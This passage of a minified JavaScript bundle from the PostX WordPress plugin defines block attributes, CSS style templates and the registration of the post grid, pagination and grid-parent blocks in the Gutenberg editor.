cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover{ text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a{ background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},headingText:{type:"string",default:"Post Grid #7"},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto;}"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }\n          {{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover, \n          {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; } \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover, \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active, \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a, \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationType:{type:"string",default:"navigation"},...(0,o.t)(["advFilter","pagiBlockCompatibility","heading","advanceAttr","pagination","video","meta","category","readMore","query"],["paginationText","loadMoreText","paginationAjax","pagiMargin","queryNumPosts"],[{key:"pagiAlign",default:{lg:"left"}},{key:"metaSeparator",default:"emptyspace"},{key:"metaList",default:'["metaAuthor","metaDate"]'},{key:"metaColor",default:"#F3F3F3"},{key:"metaSeparatorColor",default:"#b3b3b3"},{key:"metaSpacing",default:{lg:"15",unit:"px"}},{key:"catLineColor",default:"var(--postx_preset_Base_2_color)"},{key:"catLineHoverColor",default:"var(--postx_preset_Base_2_color)"},{key:"catHoverColor",default:"var(--postx_preset_Over_Primary_color)"},{key:"readMoreColor",default:"#fff"},{key:"readMoreBgColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Primary_color)"}},{key:"readMoreBgHoverColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Secondary_color)"}}]),V4_1_0_CompCheck:a.O,...(0,i.b)({defColor:"#fff"})}},83674:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(12705),r=l(37602),s=l(40577);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-grid-7/","block_docs"),p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-grid-7.svg"}),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postgrid7.svg"}},transforms:{to:[...(0,i.Z)("ultimate-post/post-grid-7")]},edit:n.Z,save:()=>null})},74711:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(53049),i=l(99838),n=l(87025),r=l(37679);const{useBlockProps:s}=wp.blockEditor,{useEffect:p}=wp.element,{useSelect:c}=wp.data,u="ultimate-post/post-pagination";function d({attributes:e,setAttributes:t,clientId:l,context:d}){const{blockId:m,paginationType:g,paginationNav:y,paginationAjax:b,paginationText:v,loadMoreText:h,postId:f}=e;p((()=>{t({blockId:l.slice(-6),postId:d.postId})}),[f]);const k=c((e=>{const t=d["post-grid-parent/postBlockClientId"];if(!t)return!1;const l=e("core/block-editor").getBlocks(t);return(0,n.FL)(l).filter((e=>e.name.includes("advanced-filter"))).length>0}),[d["post-grid-parent/postBlockClientId"]]);p((()=>{k&&!b&&t({paginationAjax:!0})}),[k,b]),p((()=>{(0,n.IG)(d["post-grid-parent/postBlockClientId"],{paginationType:g,paginationNav:y,paginationAjax:b,paginationText:v,loadMoreText:h,navPosition:"bottom"})}),[g,y,b,v,h]);const w=s({className:`ultp-block-${m} ultp-pagination-block ultp-pagination-wrap`});let x;return m&&(x=(0,i.Kh)(e,u,m,(0,a.k0)())),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(r.ZP,{attributes:e,setAttributes:t,name:u,clientId:l,forceAjax:k}),x&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:x}}),(0,o.createElement)("div",w,"loadMore"==g&&(0,a.Bv)(h),"navigation"==g&&(0,a.pI)(),"pagination"==g&&(0,a.fF)(y,b,v)))}},37679:(e,t,l)=>{"use strict";l.d(t,{ZP:()=>v});var o=l(67294),a=l(53049),i=l(13448),n=l(87025),r=l(92637);const{BlockControls:s}=wp.blockEditor,{ToolbarGroup:p}=wp.components,{__}=wp.i18n,{InspectorControls:c}=wp.blockEditor,u=["paginationType","loadMoreText","paginationText","pagiAlign","paginationNav","paginationAjax"],d=["pagiTypo","pagiArrowSize","pagiTab","pagiMargin","navMargin","pagiPadding"],m=[{data:{type:"tag",key:"paginationType",label:__("Pagination Type","ultimate-post"),options:[{value:"loadMore",label:__("Loadmore","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")},{value:"pagination",label:__("Pagination","ultimate-post")}]}},{data:{type:"text",key:"loadMoreText",label:__("Loadmore Text","ultimate-post")}},{data:{type:"text",key:"paginationText",label:__("Pagination Text","ultimate-post")}},{data:{type:"alignment",key:"pagiAlign",responsive:!0,label:__("Alignment","ultimate-post"),disableJustify:!0}},{data:{type:"select",key:"paginationNav",label:__("Pagination","ultimate-post"),options:[{value:"textArrow",label:__("Text & Arrow","ultimate-post")},{value:"onlyarrow",label:__("Only Arrow","ultimate-post")}]}},{data:{type:"toggle",key:"paginationAjax",label:__("Ajax Pagination","ultimate-post")}}],g=(e=!1)=>e?m.map((e=>"paginationAjax"===e.data.key?{data:{...e.data,disabled:!0,showDisabledValue:!0,help:n.p2}}:e)):m,y=[{data:{type:"typography",key:"pagiTypo",label:__("Typography","ultimate-post")}},{data:{type:"range",key:"pagiArrowSize",min:0,max:100,step:1,responsive:!0,label:__("Arrow Size","ultimate-post")}},{data:{type:"tab",key:"pagiTab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"pagiColor",label:__("Color","ultimate-post"),clip:!0},{type:"color2",key:"pagiBgColor",label:__("Background Color","ultimate-post")},{type:"border",key:"pagiBorder",label:__("Border","ultimate-post")},{type:"boxshadow",key:"pagiShadow",label:__("BoxShadow","ultimate-post")},{type:"dimension",key:"pagiRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"pagiHoverColor",label:__("Hover Color","ultimate-post"),clip:!0},{type:"color2",key:"pagiHoverbg",label:__("Hover Bg Color","ultimate-post")},{type:"border",key:"pagiHoverBorder",label:__("Hover Border","ultimate-post")},{type:"boxshadow",key:"pagiHoverShadow",label:__("BoxShadow","ultimate-post")},{type:"dimension",key:"pagiHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]}]}},{data:{type:"dimension",key:"pagiMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"dimension",key:"navMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"dimension",key:"pagiPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}],b=e=>[...g(e).map((e=>e.data)),...y.map((e=>e.data))];function v({name:e,attributes:t,setAttributes:l,clientId:n,forceAjax:m}){const v={setAttributes:l,name:e,attributes:t,clientId:n};return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(s,null,(0,o.createElement)(p,null,(0,o.createElement)(a.sT,{store:v,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(i.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiMargin","pagiPadding"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:v,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:v,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:u,styleKeys:d,oArgs:b(m),exStyle:["pagiTypo","pagiMargin","pagiPadding"]}))),(0,o.createElement)(c,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.T,{store:v,title:"inline",include:g(m)})),(0,o.createElement)(r.Section,{slug:"style",title:__("Styles","ultimate-post")},(0,o.createElement)(a.T,{store:v,title:"inline",include:y})))))}},82304:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},postId:{type:"number",default:-1},previewImg:{type:"string",default:""},paginationType:{type:"string",default:"pagination"},loadMoreText:{type:"string",default:"Load More",style:[{depends:[{key:"paginationType",condition:"==",value:"loadMore"}]}]},paginationText:{type:"string",default:"Previous|Next",style:[{depends:[{key:"paginationType",condition:"==",value:"pagination"}]}]},paginationNav:{type:"string",default:"textArrow",style:[{depends:[{key:"paginationType",condition:"==",value:"pagination"}]}]},paginationAjax:{type:"boolean",default:!0,style:[{depends:[{key:"paginationType",condition:"==",value:"pagination"}]}]},navPosition:{type:"string",default:"topRight",style:[{depends:[{key:"paginationType",condition:"==",value:"navigation"}]}]},pagiAlign:{type:"object",default:{lg:"center"},style:[{selector:"{{ULTP}} .ultp-loadmore,\n                {{ULTP}} .ultp-next-prev-wrap ul,\n                {{ULTP}} .ultp-pagination,\n                {{ULTP}} .ultp-pagination-wrap { text-align:{{pagiAlign}}; }"}]},pagiTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:""},style:[{selector:"{{ULTP}} .ultp-pagination-wrap .ultp-pagination li a,\n                    {{ULTP}} .ultp-loadmore .ultp-loadmore-action"}]},pagiArrowSize:{type:"object",default:{lg:"14"},style:[{depends:[{key:"paginationType",condition:"==",value:"navigation"}],selector:"{{ULTP}} .ultp-next-prev-wrap ul li a svg { width:{{pagiArrowSize}}px; }"}]},pagiColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-pagination-wrap .ultp-pagination li a,\n                    {{ULTP}} .ultp-next-prev-wrap ul li a,\n                    {{ULTP}} .ultp-loadmore .ultp-loadmore-action { color:{{pagiColor}}; }\n                    {{ULTP}} .ultp-next-prev-wrap ul li a svg { color:{{pagiColor}}; }\n                    {{ULTP}} .ultp-pagination svg,\n                    {{ULTP}} .ultp-loadmore .ultp-loadmore-action svg { color:{{pagiColor}}; }"}]},pagiBgColor:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Primary_color)"},style:[{selector:"{{ULTP}} .ultp-pagination-wrap .ultp-pagination li a,\n                    {{ULTP}} .ultp-next-prev-wrap ul li a,\n                    {{ULTP}} .ultp-loadmore .ultp-loadmore-action"}]},pagiBorder:{type:"object",default:{openBorder:1,width:{top:0,right:0,bottom:0,left:0},color:"#000000",type:"solid"},style:[{selector:"{{ULTP}} .ultp-pagination li a,\n                    {{ULTP}} .ultp-next-prev-wrap ul li a,\n                    {{ULTP}} .ultp-loadmore-action"}]},pagiShadow:{type:"object",default:{openShadow:1,width:{top:0,right:0,bottom:0,left:0},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-pagination li a,\n                    {{ULTP}} .ultp-next-prev-wrap ul li a,\n                    {{ULTP}} .ultp-loadmore-action"}]},pagiRadius:{type:"object",default:{lg:{top:"2",bottom:"2",left:"2",right:"2",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-pagination li a,\n                    {{ULTP}} .ultp-next-prev-wrap ul li a,\n                    {{ULTP}} .ultp-loadmore-action { border-radius:{{pagiRadius}}; }"}]},pagiHoverColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-pagination-wrap .ultp-pagination li.pagination-active a,\n                    {{ULTP}} .ultp-next-prev-wrap ul li a:hover,\n                    {{ULTP}} .ultp-loadmore-action:hover { color:{{pagiHoverColor}}; }\n                    {{ULTP}} .ultp-pagination li a:hover svg { color:{{pagiHoverColor}}; }\n                    {{ULTP}} .ultp-next-prev-wrap ul li a:hover svg,\n                    {{ULTP}} .ultp-loadmore .ultp-loadmore-action:hover svg { color:{{pagiHoverColor}}; } @media (min-width: 768px) {\n                    {{ULTP}} .ultp-pagination-wrap .ultp-pagination li a:hover { color:{{pagiHoverColor}};}}"}]},pagiHoverbg:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Secondary_color)",replace:1},style:[{selector:"{{ULTP}} .ultp-pagination-wrap .ultp-pagination li a:hover,\n                    {{ULTP}} .ultp-pagination-wrap .ultp-pagination li.pagination-active a,\n                    {{ULTP}} .ultp-pagination-wrap .ultp-pagination li a:focus,\n                    {{ULTP}} .ultp-next-prev-wrap ul li a:hover,\n                    {{ULTP}} .ultp-loadmore-action:hover{ {{pagiHoverbg}} }"}]},pagiHoverBorder:{type:"object",default:{openBorder:1,width:{top:0,right:0,bottom:0,left:0},color:"#000000",type:"solid"},style:[{selector:"{{ULTP}} .ultp-pagination li a:hover,\n                    {{ULTP}} .ultp-pagination li.pagination-active a,\n                    {{ULTP}} .ultp-next-prev-wrap ul li a:hover,\n                    {{ULTP}} .ultp-loadmore-action:hover"}]},pagiHoverShadow:{type:"object",default:{openShadow:1,width:{top:0,right:0,bottom:0,left:0},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-pagination li a:hover,\n                    {{ULTP}} .ultp-pagination li.pagination-active a,\n                    {{ULTP}} .ultp-next-prev-wrap ul li a:hover,\n                    {{ULTP}} .ultp-loadmore-action:hover"}]},pagiHoverRadius:{type:"object",default:{lg:{top:"2",bottom:"2",left:"2",right:"2",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-pagination li.pagination-active a,\n                    {{ULTP}} .ultp-pagination li a:hover,\n                    {{ULTP}} .ultp-next-prev-wrap ul li a:hover,\n                    {{ULTP}} .ultp-loadmore-action:hover { border-radius:{{pagiHoverRadius}}; }"}]},pagiPadding:{type:"object",default:{lg:{top:"8",bottom:"8",left:"14",right:"14",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-pagination li a,\n                    {{ULTP}} .ultp-next-prev-wrap ul li a,\n                    {{ULTP}} .ultp-loadmore-action { padding:{{pagiPadding}}; }"}]},navMargin:{type:"object",default:{lg:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"}},style:[{depends:[{key:"paginationType",condition:"==",value:"navigation"}],selector:"{{ULTP}} .ultp-next-prev-wrap ul { margin:{{navMargin}}; }"}]},pagiMargin:{type:"object",default:{lg:{top:"30",right:"0",bottom:"0",left:"0",unit:"px"}},style:[{depends:[{key:"paginationType",condition:"!=",value:"navigation"}],selector:"{{ULTP}} .ultp-pagination-wrap .ultp-pagination,\n                    {{ULTP}} .ultp-loadmore { margin:{{pagiMargin}}; }"}]}}},30365:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(82304),n=l(53991),r=l(74711),s=l(84006);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks,c=(0,a.Z)("https://wpxpo.com/docs/postx/postx-features/advanced-pagination/","block_docs");p(n,{icon:(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/pagination.svg"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Post Pagination from PostX","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:c,rel:"noreferrer"},__("Documentation","ultimate-post"))),attributes:i.Z,usesContext:["postId","post-grid-parent/postBlockClientId","post-grid-parent/pagi"],ancestor:["ultimate-post/post-grid-parent"],edit:r.Z,save:s.Z})},84006:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294),a=l(53049),i=l(99838);const{useBlockProps:n}=wp.blockEditor,r="ultimate-post/post-pagination";function s({attributes:e}){const{blockId:t,paginationType:l,paginationNav:s,paginationAjax:p,paginationText:c,loadMoreText:u,postId:d}=e,m=n.save({className:`ultp-block-${t} ultp-pagination-block ultp-pagination-wrap`});let g="";return t&&(g=(0,i.Kh)(e,r,t,(0,a.k0)())),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(o.Fragment,null,g&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:g}})),(0,o.createElement)("div",m,"loadMore"==l&&(0,a.Bv)(u),"navigation"==l&&(0,a.pI)(),"pagination"==l&&(0,a.fF)(s,p,c)))}},4696:(e,t,l)=>{"use strict";l.d(t,{Z:()=>g});var o=l(67294),a=l(53049),i=l(87025);const{getBlockAttributes:n,getBlockRootClientId:r}=wp.data.select("core/block-editor"),{useBlockProps:s,useInnerBlocksProps:p}=wp.blockEditor,{useEffect:c,useMemo:u}=wp.element,{useSelect:d,useDispatch:m}=wp.data;function g({attributes:e,setAttributes:t,clientId:l,context:g,isSelected:y}){const[b,v,h,f]=d((e=>{const t=e("core/block-editor").getBlocks(l),o=(0,i.FL)(t),a=o.filter((e=>(0,i.M5)(e.name))).map((e=>({blockId:e.attributes.blockId,name:e.name.replace("/","_")}))),n=o.filter((e=>e.name.includes("ultimate-post/post-pagination"))).map((e=>"ultp-block-"+e.attributes.blockId)),r=o.filter((e=>e.name.includes("advanced-filter"))).map((e=>"ultp-block-"+e.attributes.blockId)),s=!(a.length>0)||["ultimate-post/advanced-filter","ultimate-post/post-pagination",...a.map((e=>e.name.replace("_","/")))];return[JSON.stringify(a),JSON.stringify(n),JSON.stringify(r),s]}),[l]);c((()=>{if(y)try{document.querySelector(".block-list-appender").style.display="none"}catch{}}),[y]);const k=p(s({className:"ultp-post-grid-parent"}),{allowedBlocks:f});return c((()=>{const{currentPostId:o}=e,i=n(r(l));(0,a.qi)(t,i,o,l),t({cId:l,grids:b,pagi:v,postId:g.postId?String(g.postId):"",currentPostId:g.postId?String(g.postId):""})}),[l,b,v,g.postId]),function(e){var t;const{updateBlockAttributes:l}=m("core/block-editor"),o=d((t=>t("core/block-editor").getBlocks(e)),[]),a=u((()=>(0,i.FL)(o)),[o]),n=u((()=>a.filter((e=>"ultimate-post/filter-select"===e.name&&["category","tags","custom_tax","author"].includes(e.attributes.type)))),[a]),r=u((()=>a.filter((e=>(0,i.M5)(e.name)))),[a]);c((()=>{const e={};n.forEach((t=>{const{dropdownOptionsType:l,dropdownOptions:o,type:a,filterStyle:i}=t.attributes,n=JSON.parse(o)[0];"dropdown"===i&&"specific"===l&&n&&(e[t.clientId]=`${a}###${n}`)})),r.forEach((t=>{const{attributes:{defQueryTax:o}}=t;if(Object.keys(e).length>0){let a=!1;for(const t of Object.keys(e))if(!(t in o)||o[t]!==e[t]){a=!0;break}a&&l(t.clientId,{defQueryTax:e})}else 0!==Object.keys(o).length&&l(t.clientId,{defQueryTax:{}})}))}),[n,r]);const s=u((()=>a.find((e=>"ultimate-post/advanced-filter"===e.name))),[a]),{relation:p}=null!==(t=s?.attributes)&&void 0!==t?t:{};c((()=>{p&&r.forEach((e=>{e.attributes.advRelation!==p&&l(e.clientId,{advRelation:p})}))}),[r,p])}(l),(0,o.createElement)("div",k)}},55261:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(87462),a=l(67294);const{useBlockProps:i,useInnerBlocksProps:n}=wp.blockEditor;function r({attributes:e}){const t=n.save(i.save({className:"ultp-post-grid-parent"}));return(0,a.createElement)("div",(0,o.Z)({},t,{"data-postid":e.currentPostId,"data-grids":e.grids,"data-pagi":e.pagi}))}},97575:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},cId:{type:"string",default:""},postId:{type:"string",default:""},currentPostId:{type:"string",default:""},previewImg:{type:"string",default:""},advFilterEnable:{type:"boolean",default:!1},grids:{type:"string",default:""},pagi:{type:"string",default:""}}},82177:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(4696),r=l(55261),s=l(97575),p=l(26887);const{__}=wp.i18n,{registerBlockType:c}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-grid-1/","block_docs"),c(p,{icon:(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/adv-filter/post-block.svg"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Post Block from PostX","ultimate-post")),providesContext:{"post-grid-parent/postBlockClientId":"cId","post-grid-parent/pagi":"pagi"},usesContext:["postId"],attributes:s.Z,transforms:{to:[...(0,i.Z)("ultimate-post/post-grid-parent"),...(0,i.Z)("ultimate-post/post-grid-parent","listBlocks")]},edit:n.Z,save:r.Z})},64173:(e,t,l)=>{"use strict";l.d(t,{Z:()=>M});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(53508),c=l(46896),u=l(71411),d=l(93985),m=l(8152),g=l(76005),y=l(99838),b=l(31760),v=l(73151),h=l(69735),f=l(2963),k=l(39349),w=l(87025),x=l(32616);const{__}=wp.i18n,{InspectorControls:T,useBlockProps:_}=wp.blockEditor,{useEffect:C,useState:E,useRef:S,Fragment:P}=wp.element,{Spinner:L,Placeholder:I}=wp.components,{getBlockAttributes:B,getBlockRootClientId:U}=wp.data.select("core/block-editor");function M(e){const 